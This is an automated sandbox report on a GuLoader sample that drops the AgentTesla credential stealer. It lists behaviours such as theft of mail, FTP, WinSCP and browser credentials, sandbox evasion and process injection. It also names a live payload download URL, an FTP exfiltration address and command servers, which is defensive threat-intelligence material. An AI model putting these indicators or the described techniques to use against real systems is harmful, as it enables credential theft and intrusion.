Generated by Joe Sandbox

Date post: 30-Mar-2023
ID: 638284
Sample Name: ref002062022pago062022.exe
Cookbook: default.jbs
Time: 16:43:36
Date: 02/06/2022
Version: 34.0.0 Boulder Opal


Table of Contents

Windows Analysis Report ref002062022pago062022.exe
  Overview
    General Information
    Detection
    Signatures
    Classification
  Process Tree
  Malware Configuration
    Threatname: GuLoader
  Yara Signatures
    Memory Dumps
  Sigma Signatures
  Snort Signatures
  Joe Sandbox Signatures
    AV Detection
    Networking
    Data Obfuscation
    Malware Analysis System Evasion
    HIPS / PFW / Operating System Protection Evasion
    Stealing of Sensitive Information
    Remote Access Functionality
  Mitre Att&ck Matrix
  Behavior Graph
  Screenshots
    Thumbnails
  Antivirus, Machine Learning and Genetic Malware Detection
    Initial Sample
    Dropped Files
    Unpacked PE Files
    Domains
    URLs
  Domains and IPs
    Contacted Domains
    Contacted URLs
    URLs from Memory and Binaries
    World Map of Contacted IPs
    Public IPs
  General Information
  Warnings
  Simulations
    Behavior and APIs
  Joe Sandbox View / Context
    IPs
    Domains
    ASNs
    JA3 Fingerprints
    Dropped Files
  Created / dropped Files
    C:\Users\user\AppData\Local\Temp\Ostentativt.Arn
    C:\Users\user\AppData\Local\Temp\TChinese.ini
    C:\Users\user\AppData\Local\Temp\datastrrelsens.Til5
    C:\Users\user\AppData\Local\Temp\nsnA19B.tmp\System.dll
    C:\Users\user\AppData\Local\Temp\window-close-symbolic.symbolic.png
    C:\Windows\Logs\waasmedic\waasmedic.20220602_155203_861.etl
    \Device\ConDrv
  Static File Info
    General
    File Icon
    Static PE Info
      General
      Entrypoint Preview
      Rich Headers
      Data Directories
      Sections
      Resources
      Imports
      Version Infos
      Possible Origin
  Network Behavior
    Network Port Distribution
    TCP Packets
    UDP Packets
    DNS Queries

Copyright Joe Security LLC 2022 Page 2 of 26

    DNS Answers
    HTTP Request Dependency Graph
    HTTP Packets
  Statistics
    Behavior
  System Behavior
    Analysis Process: ref002062022pago062022.exe PID: 3504, Parent PID: 8512
      General
      File Activities
      Registry Activities
    Analysis Process: CasPol.exe PID: 1664, Parent PID: 3504
      General
    Analysis Process: CasPol.exe PID: 1740, Parent PID: 3504
      General
    Analysis Process: CasPol.exe PID: 1900, Parent PID: 3504
      General
    Analysis Process: CasPol.exe PID: 2172, Parent PID: 3504
      General
    Analysis Process: CasPol.exe PID: 1836, Parent PID: 3504
      General
      File Activities
        File Created
        File Written
        File Read
      Registry Activities
        Key Created
        Key Value Created
    Analysis Process: conhost.exe PID: 1840, Parent PID: 1836
      General
      File Activities
    Analysis Process: svchost.exe PID: 1900, Parent PID: 888
      General
      Registry Activities
  Disassembly

Windows Analysis Report ref002062022pago062022.exe

Overview

General Information

Sample Name: ref002062022pago062022.exe
Analysis ID: 638284
MD5: 7500c0e8df88d1…
SHA1: 5e20971a917ceb…
SHA256: a4888274290402…

Detection

AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration

Multi AV Scanner detection for subm…

Yara detected AgentTesla

Antivirus detection for URL or domain

Yara detected GuLoader

Tries to steal Mail credentials (via fi…

Writes to foreign memory regions

Tries to harvest and steal Putty / W…

Tries to detect Any.run

Tries to harvest and steal ftp login c…

Tries to detect sandboxes and other…

C2 URLs / IPs found in malware con…

Queries sensitive network adapter in…

Tries to harvest and steal browser in…

Queries sensitive BIOS Information…

Uses 32bit PE files

Queries the volume information (nam…

May sleep (evasive loops) to hinder…

Contains functionality to shutdown /…

Uses code obfuscation techniques (…

Internet Provider seen in connection…

Detected potential crypto function

Found potential string decryption / a…

Sample execution stops while proce…

Yara detected Credential Stealer

Contains functionality to call native …

Contains functionality to dynamicall…

Contains functionality for execution …

Contains long sleeps (>= 3 min)

Abnormal high CPU Usage

Enables debug privileges

Found a high number of Window / U…

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PE…

Uses a known web browser user age…

Checks if the current process is bei…

Classification

[Classification chart; axes: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale: clean, suspicious, malicious]

Process Tree

System is w10x64native

ref002062022pago062022.exe (PID: 3504 cmdline: "C:\Users\user\Desktop\ref002062022pago062022.exe" MD5: 7500C0E8DF88D12316724078FFBEEFAA)
  CasPol.exe (PID: 1664 cmdline: "C:\Users\user\Desktop\ref002062022pago062022.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
  CasPol.exe (PID: 1740 cmdline: "C:\Users\user\Desktop\ref002062022pago062022.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
  CasPol.exe (PID: 1900 cmdline: "C:\Users\user\Desktop\ref002062022pago062022.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
  CasPol.exe (PID: 2172 cmdline: "C:\Users\user\Desktop\ref002062022pago062022.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
  CasPol.exe (PID: 1836 cmdline: "C:\Users\user\Desktop\ref002062022pago062022.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
    conhost.exe (PID: 1840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
svchost.exe (PID: 1900 cmdline: C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc MD5: F586835082F632DC8D9404D83BC16316)
cleanup

Malware Configuration

Threatname: GuLoader

{ "Payload URL": "http://jmariecompany.com/Buhari0f_XGXisVNVRE198.bin"}

Yara Signatures

Memory Dumps

Source Rule Description Author Strings
00000000.00000002.1514512086.0000000002A00000.00000040.00001000.00020000.00000000.sdmp JoeSecurity_GuLoader_2 Yara detected GuLoader Joe Security
00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp JoeSecurity_AgentTesla_1 Yara detected AgentTesla Joe Security

00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp JoeSecurity_CredentialStealer Yara detected Credential Stealer Joe Security
00000007.00000000.856205776.0000000001100000.00000040.00000400.00020000.00000000.sdmp JoeSecurity_GuLoader_2 Yara detected GuLoader Joe Security
Process Memory Space: CasPol.exe PID: 1836 JoeSecurity_AgentTesla_1 Yara detected AgentTesla Joe Security

Sigma Signatures

⊘ No Sigma rule has matched

Snort Signatures

⊘ No Snort rule has matched

Joe Sandbox Signatures

AV Detection

Found malware configuration
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain

Networking

C2 URLs / IPs found in malware configuration

Data Obfuscation

Yara detected GuLoader

Malware Analysis System Evasion

Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Stealing of Sensitive Information

Yara detected AgentTesla
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to harvest and steal browser information (history, passwords, etc)

Remote Access Functionality

Yara detected AgentTesla

Mitre Att&ck Matrix

Techniques listed by tactic column; numbers in parentheses are the counts shown in the matrix cell.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Windows Management Instrumentation (2 1 1); Native API (1); At (Linux); At (Windows); Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Privilege Escalation: DLL Side-Loading (1); Access Token Manipulation (1); Process Injection (1 1 1); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); DLL Side-Loading (1); Virtualization/Sandbox Evasion (2 5 1); Access Token Manipulation (1); Process Injection (1 1 1)
Credential Access: OS Credential Dumping (2); Credentials in Registry (1); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: File and Directory Discovery (3); System Information Discovery (1 1 7); Security Software Discovery (3 3 1); Process Discovery (1); Virtualization/Sandbox Evasion (2 5 1); Application Window Discovery (1); Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Archive Collected Data (1); Data from Local System (2); Email Collection (1); Clipboard Data (1); Keylogging; GUI Input Capture; Web Portal Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Command and Control: Ingress Tool Transfer (1); Encrypted Channel (1); Non-Application Layer Protocol (2); Application Layer Protocol (1 1 2); Fallback Channels; Multiband Communication; Commonly Used Port
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: System Shutdown/Reboot (1); Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact

Behavior Graph

ID: 638284
Sample: ref002062022pago062022.exe
Startdate: 02/06/2022
Architecture: WINDOWS
Score: 100

[Behavior graph figure; node and edge labels recovered in reading order:]
jmariecompany.com, alighierieventos.com
Found malware configuration; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 4 other signatures
ref002062022pago062022.exe (started)
C:\Users\user\AppData\Local\...\System.dll, PE32 (dropped)
Writes to foreign memory regions; Tries to detect Any.run
CasPol.exe (started); CasPol.exe (started); svchost.exe (started); 3 other processes
jmariecompany.com 139.28.232.231, 49746, 80; DEDIPATH-LLCUS; Netherlands
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; 2 other signatures
conhost.exe (started)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source Detection Scanner Label Link
ref002062022pago062022.exe 16% Virustotal Browse
ref002062022pago062022.exe 22% ReversingLabs Win32.Downloader.GuLoader

Dropped Files

Source Detection Scanner Label Link
C:\Users\user\AppData\Local\Temp\nsnA19B.tmp\System.dll 3% Metadefender Browse
C:\Users\user\AppData\Local\Temp\nsnA19B.tmp\System.dll 0% ReversingLabs

Unpacked PE Files

⊘ No Antivirus matches

Domains

⊘ No Antivirus matches

URLs

Source Detection Scanner Label Link
https://api.ipify.org%t- 0% Avira URL Cloud safe
ftp://alighierieventos.com/buhari0f9ja 100% Avira URL Cloud malware
tVzYUP.com 0% Avira URL Cloud safe
127.0.0.1:HTTP/1.1 0% Avira URL Cloud safe
https://api.ipify.org%%startupfolder% 0% Avira URL Cloud safe
jmariecompany.com/Buhari0f_XGXisVNVRE198.bin2 0% Avira URL Cloud safe
jmariecompany.com/Buhari0f_XGXisVNVRE198.bin 0% Avira URL Cloud safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www 0% Avira URL Cloud safe
DynDns.comDynDNSnamejidpasswordPsi/Psi 0% Avira URL Cloud safe
https://rPVMd8mXTm2hvq.com 0% Avira URL Cloud safe

Domains and IPs

Contacted Domains

Name IP Active Malicious Antivirus Detection Reputation
dual-a-0001.a-msedge.net 13.107.21.200 true false unknown
alighierieventos.com 50.31.177.39 true false unknown
jmariecompany.com 139.28.232.231 true true unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
jmariecompany.com/Buhari0f_XGXisVNVRE198.bin true Avira URL Cloud: safe unknown

URLs from Memory and Binaries

Name Source Malicious Antivirus Detection Reputation
https://api.ipify.org%t- CasPol.exe, 00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp false Avira URL Cloud: safe low
ftp://alighierieventos.com/buhari0f9ja CasPol.exe, 00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp true Avira URL Cloud: malware unknown
tVzYUP.com CasPol.exe, 00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp false Avira URL Cloud: safe unknown
127.0.0.1:HTTP/1.1 CasPol.exe, 00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp false Avira URL Cloud: safe low
https://api.ipify.org%%startupfolder% CasPol.exe, 00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp false Avira URL Cloud: safe low
jmariecompany.com/Buhari0f_XGXisVNVRE198.bin2 CasPol.exe, 00000007.00000002.5725601189.0000000001546000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000007.00000003.1098316376.000000000154C000.00000004.00000020.00020000.00000000.sdmp false Avira URL Cloud: safe unknown
nsis.sf.net/NSIS_ErrorError ref002062022pago062022.exe false high
schemas.xmlsoap.org/ws/2005/05/identity/claims/name CasPol.exe, 00000007.00000002.5752989159.000000001D9CA000.00000004.00000800.00020000.00000000.sdmp false high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www CasPol.exe, 00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp false Avira URL Cloud: safe unknown
DynDns.comDynDNSnamejidpasswordPsi/Psi CasPol.exe, 00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp false Avira URL Cloud: safe unknown
https://rPVMd8mXTm2hvq.com CasPol.exe, 00000007.00000002.5752989159.000000001D9CA000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000007.00000003.1041975921.000000001C6D1000.00000004.00000020.00020000.00000000.sdmp false Avira URL Cloud: safe unknown

World Map of Contacted IPs

[World map figure; legend: No. of IPs < 25%, 25% < No. of IPs < 50%, 50% < No. of IPs < 75%, 75% < No. of IPs]

Public IPs

IP Domain Country Flag ASN ASN Name Malicious
139.28.232.231 jmariecompany.com Netherlands 35913 DEDIPATH-LLCUS true

General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 638284
Start date and time: 02/06/2022 16:43:36 (2022-06-02 16:43:36 +02:00)
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 14m 27s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: ref002062022pago062022.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name: Suspected Instruction Hammering
Number of analysed new started processes analysed: 37
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies: HCA enabled, EGA enabled, HDC enabled, AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@13/7@3/1
EGA Information: Successful, ratio: 100%
HDC Information: Successful, ratio: 18.5% (good quality ratio 18.1%); Quality average: 88.2%; Quality standard deviation: 21.4%
HCA Information: Successful, ratio: 99%; Number of executed functions: 0; Number of non-executed functions: 0
Cookbook Comments: Found application associated with file extension: .exe; Adjust boot time; Enable AMSI

Warnings

Exclude process from analysis (whitelisted): taskhostw.exe, MusNotification.exe, dllhost.exe, RuntimeBroker.exe, SIHClient.exe, backgroundTaskHost.exe, MoUsoCoreWorker.exe, MusNotificationUx.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, svchost.exe
TCP Packets have been reduced to 100
Excluded IPs from analysis (whitelisted): 40.117.96.136, 13.107.5.88, 51.105.236.244, 51.124.57.242
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, e-0009.e-msedge.net, arc.msn.com, login.live.com, img-prod-cms-rt-microsoft-com.akamaized.net, www.bing.com, evoke-windowsservices-tas-msedge-net.e-0009.e-msedge.net, client.wns.windows.com, fs.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, wdcp.microsoft.com, wd-prod-cp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, ris.api.iris.microsoft.com, wdcpalt.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, apimgmttmr17ij3jt5dneg64srod9jevcuajxaoube4brtu9cq.trafficmanager.net, evoke-windowsservices-tas.msedge.net, apimgmthszbjimgeglorvthkncixvpso9vnynvh3ehmsdll33a.cloudapp.net, wd-prod-cp-eu-west-1-fe.westeurope.cloudapp.azure.com, nexusrules.officeapps.live.com, manage.devcenter.microsoft.com, wd-prod-cp-eu-west-3-fe.westeurope.cloudapp.azure.com
Not all processes were analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time Type Description
16:46:22 API Interceptor 2759x Sleep call for process: CasPol.exe modified

Joe Sandbox View / Context

IPs

⊘ No context

Domains

⊘ No context

ASNs

⊘ No context

JA3 Fingerprints

⊘ No context

Dropped Files

⊘ No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Ostentativt.Arn

Process: C:\Users\user\Desktop\ref002062022pago062022.exe
File Type: data
Category: dropped
Size (bytes): 84955
Entropy (8bit): 6.493773506936205
Encrypted: false
SSDEEP: 1536:+c+7NKOl3NFSGc4zKyxqBfoRio6XA5A/x8aveGlalwm:+c+b57Nc4Tqat2/xgl5
MD5: 7913F41BDE98D253E411ED6C39072084
SHA1: 0F278DD10891F54ED93490358D8E2962D7CB4446
SHA-256: E48696EE8CACBBF70AB01F8BCFA00887BC1F499233419BCFA9963AECE2F5F061
SHA-512: 3D32411E45A46C3526BDD3B92134DC67B8485F1A97FAE97CA0F7B67C4BA74925AC26003603019B44D04F34B0966AD6615F34F354E6259F8D88B21E62543435ED
Malicious: false
Reputation: low

C:\Users\user\AppData\Local\Temp\TChinese.ini

Process: C:\Users\user\Desktop\ref002062022pago062022.exe
File Type: Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category: dropped
Size (bytes): 2298
Entropy (8bit): 4.473680609114741
Encrypted: false
SSDEEP: 48:rL4i5ST3JO8HvYe6jj90Pb/wt2Btvtl3IoweHuK:rL4i52JhHvYe63CjtHv39d
MD5: 92F6C6E96B642FDFAE071A6522F8D23D
SHA1: 7ABB9950955094F3717E5CE55D6C4EE4C4AC9B61
SHA-256: F1156ACD8EE2349454B3C55917E19EF81DB3491B241658B99E6DAF628DEB9913
SHA-512: F3B3548E21CF1BDF47A1191880AE2D8122B1ADDB0E6B371EE3EA3D7D6F205B09213D15492086526D9F9EFC836CFBC880616B1D746B3C9C12F9144B6F9B77ADA0
Malicious: false
Reputation: low

C:\Users\user\AppData\Local\Temp\datastrrelsens.Til5

Process: C:\Users\user\Desktop\ref002062022pago062022.exe
File Type: ASCII text, with very long lines, with no line terminators
Category: dropped
Size (bytes): 19664
Entropy (8bit): 3.9986948974384626
Encrypted: false
SSDEEP: 384:LW5aeHlhv8r7DhA9znQeTRa1gOOFqV1+dHle6LCS+4ssqpM4XjqJZd:KQqRmXknmKFqV1SCSDZ4zqJZd
MD5: CCA75233F04853DE46ACFD473166211B
SHA1: D053CB686993FD4465B4ED47160675E05B76C96F
SHA-256: 85A665CE6DEBBF8D5FECE6BEF104A8DD0C5EA737DCF95C9F682298769E41ED5F
SHA-512: FD56C82A47E732B68EC5A0077A283921BCDB9B1450C8B04FFDD2768C7626E41009333B737CFC0E674231BE48043A92FE9F7DC9A10346A5BE41BE7CE9988A364C
Malicious: false

C:\Users\user\AppData\Local\Temp\nsnA19B.tmp\System.dll

Process: C:\Users\user\Desktop\ref002062022pago062022.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 12288
Entropy (8bit): 5.814115788739565
Encrypted: false
SSDEEP: 192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
MD5: CFF85C549D536F651D4FB8387F1976F2
SHA1: D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
SHA-256: 8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
SHA-512: 531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
Malicious: false
Antivirus: Metadefender, Detection: 3%, Browse; ReversingLabs, Detection: 0%

C:\Users\user\AppData\Local\Temp\window-close-symbolic.symbolic.png

Process: C:\Users\user\Desktop\ref002062022pago062022.exe
File Type: PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 195
Entropy (8bit): 6.320143910674748
Encrypted: false
SSDEEP: 3:yionv//thPl9vt3lAnsrtxBll/V0MaYAWrsWm8uH4FTeBT3XLaKwrgpHIQ32kVU7:6v/lhPyskMaDsTuiSBTrar+IQ32k2VLp
MD5: CF42A428EB747F762D55241CFBE28294
SHA1: 6BE84AD9DD71A758407455F58ADEFF7567CD64AA
SHA-256: F27C644A9F71175C447D2C89186F9E88E26BBB30A9D0AB75F4FEF23A44F08C21
SHA-512: 5E92FA2A3B42A863B6D7DD57ADB0EEC4EB5BCAB2344558B456F3C27E9189A6DF6E844A7F628CFC0B494249F03B7F34BC28F8D49A4B5B6110CB488EE1BB001A68
Malicious: false

C:\Windows\Logs\waasmedic\waasmedic.20220602_155203_861.etl

Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 12288
Entropy (8bit): 2.8128752827547734
Encrypted: false
SSDEEP: 96:lP2Ei0UR030i0E0U970Cl40k0U950Cl5090U990ClP0qD0U9H0ClgQ09G:tZk1vyIiPyWj6y6hqAyU3w
MD5: 5D7A3D8D2BEB69CF108F85C7F84F339A
SHA1: 1627D890DD5A3CE7FC5FA048840A45CD73F4C5F5
SHA-256: 443AD11610FFC666B82044B7EE96C9AA753C578F2B1D5376C40748B41DD2CE5C
SHA-512: A666B71B8DC7E399E9C1D5B70F0A77BD0C92DB6E62710BA06D09621FC446549C942FC2F4C911429D37DB15753D3AD9C770420C5B9365698946AA76D658DA2484
Malicious: false

\Device\ConDrv

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 30
Entropy (8bit): 3.964735178725505
Encrypted: false
SSDEEP: 3:IBVFBWAGRHneyy:ITqAGRHner
MD5: 9F754B47B351EF0FC32527B541420595
SHA1: 006C66220B33E98C725B73495FE97B3291CE14D9
SHA-256: 0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
SHA-512: C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
Malicious: false
Preview: NordVPN directory not found!..

File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive

Entropy (8bit): 6.875472756643268

TrID: Win32 Executable (generic) a (10002005/4) 99.96%Generic Win/DOS Executable (2004/3) 0.02%DOS Executable Generic (2002/1) 0.02%Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%

File name: ref002062022pago062022.exe

File size: 275627

MD5: 7500c0e8df88d12316724078ffbeefaa

SHA1: 5e20971a917ceb5a29690584f893dc30f284956e

SHA256: a488827429040238f86305283944e1429897f94e4f629cbbbdf8d42d74af1d1a

SHA512: 576fc4e57315c610cac60d7d4c4a3b60d8048ced532bb7142c5e5a0b461a905dce374aa481b123be802a015d5f95658d8469d679c1ec94074d0e87ed00d6904c

SSDEEP: 6144:rbE/HU89oytSQlfP6YFqlMTva8/iEJcd39Y7:rbg9Z1xFqaT5/IdU

TLSH: 5744D052B700D1E7D772CB700C769FA65A69FC2386619E1723803B9F6CB3190DA2B5C5

File Content Preview:

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j.........

Icon Hash: e0e8e8e8e0fae2e0

Entrypoint: 0x40352d

Entrypoint Section: .text

Digitally signed: false

Imagebase: 0x400000

Subsystem: windows gui

Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Time Stamp: 0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]

TLS Callbacks:

CLR (.Net) Version:

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Copyright Joe Security LLC 2022 Page 14 of 26

OS Version Major: 4

OS Version Minor: 0

File Version Major: 4

File Version Minor: 0

Subsystem Version Major: 4

Subsystem Version Minor: 0

Import Hash: 56a78d55f3f7af51443e58e0ce2fb5f6

Instruction

push ebp

mov ebp, esp

sub esp, 000003F4h

push ebx

push esi

push edi

push 00000020h

pop edi

xor ebx, ebx

push 00008001h

mov dword ptr [ebp-14h], ebx

mov dword ptr [ebp-04h], 0040A2E0h

mov dword ptr [ebp-10h], ebx

call dword ptr [004080CCh]

mov esi, dword ptr [004080D0h]

lea eax, dword ptr [ebp-00000140h]

push eax

mov dword ptr [ebp-0000012Ch], ebx

mov dword ptr [ebp-2Ch], ebx

mov dword ptr [ebp-28h], ebx

mov dword ptr [ebp-00000140h], 0000011Ch

call esi

test eax, eax

jne 00007F7D8CBB9D7Ah

lea eax, dword ptr [ebp-00000140h]

mov dword ptr [ebp-00000140h], 00000114h

push eax

call esi

mov ax, word ptr [ebp-0000012Ch]

mov ecx, dword ptr [ebp-00000112h]

sub ax, 00000053h

add ecx, FFFFFFD0h

neg ax

sbb eax, eax

mov byte ptr [ebp-26h], 00000004h

not eax

and eax, ecx

mov word ptr [ebp-2Ch], ax

cmp dword ptr [ebp-0000013Ch], 0Ah

jnc 00007F7D8CBB9D4Ah

and word ptr [ebp-00000132h], 0000h

mov eax, dword ptr [ebp-00000134h]

movzx ecx, byte ptr [ebp-00000138h]

mov dword ptr [00434FB8h], eax

xor eax, eax

mov ah, byte ptr [ebp-0000013Ch]

movzx eax, ax

or eax, ecx

xor ecx, ecx

mov ch, byte ptr [ebp-2Ch]

Entrypoint Preview


movzx ecx, cx

shl eax, 10h

or eax, ecx


Programming Language: [EXP] VC++ 6.0 SP5 build 8804

Name Virtual Address Virtual Size Is in Section

IMAGE_DIRECTORY_ENTRY_EXPORT 0x0 0x0

IMAGE_DIRECTORY_ENTRY_IMPORT 0x8610 0xa0 .rdata

IMAGE_DIRECTORY_ENTRY_RESOURCE 0x59000 0x284d0 .rsrc

IMAGE_DIRECTORY_ENTRY_EXCEPTION 0x0 0x0

IMAGE_DIRECTORY_ENTRY_SECURITY 0x0 0x0

IMAGE_DIRECTORY_ENTRY_BASERELOC 0x0 0x0

IMAGE_DIRECTORY_ENTRY_DEBUG 0x0 0x0

IMAGE_DIRECTORY_ENTRY_COPYRIGHT 0x0 0x0

IMAGE_DIRECTORY_ENTRY_GLOBALPTR 0x0 0x0

IMAGE_DIRECTORY_ENTRY_TLS 0x0 0x0

IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG 0x0 0x0

IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT 0x0 0x0

IMAGE_DIRECTORY_ENTRY_IAT 0x8000 0x2b0 .rdata

IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT 0x0 0x0

IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR 0x0 0x0

IMAGE_DIRECTORY_ENTRY_RESERVED 0x0 0x0

Name Virtual Address Virtual Size Raw Size Xored PE ZLIB Complexity File Type Entropy Characteristics

.text 0x1000 0x6897 0x6a00 False 0.666126179245 data 6.45839821493 IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

.rdata 0x8000 0x14a6 0x1600 False 0.439275568182 data 5.02410928126 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

.data 0xa000 0x2b018 0x600 False 0.521484375 data 4.15458210409 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

.ndata 0x36000 0x23000 0x0 False 0 empty 0.0 IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ

.rsrc 0x59000 0x284d0 0x28600 False 0.555334510449 data 6.08130361493 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Name RVA Size Type Language Country

RT_ICON 0x59358 0x10828 dBase III DBT, version number 0, next free block index 40 English United States

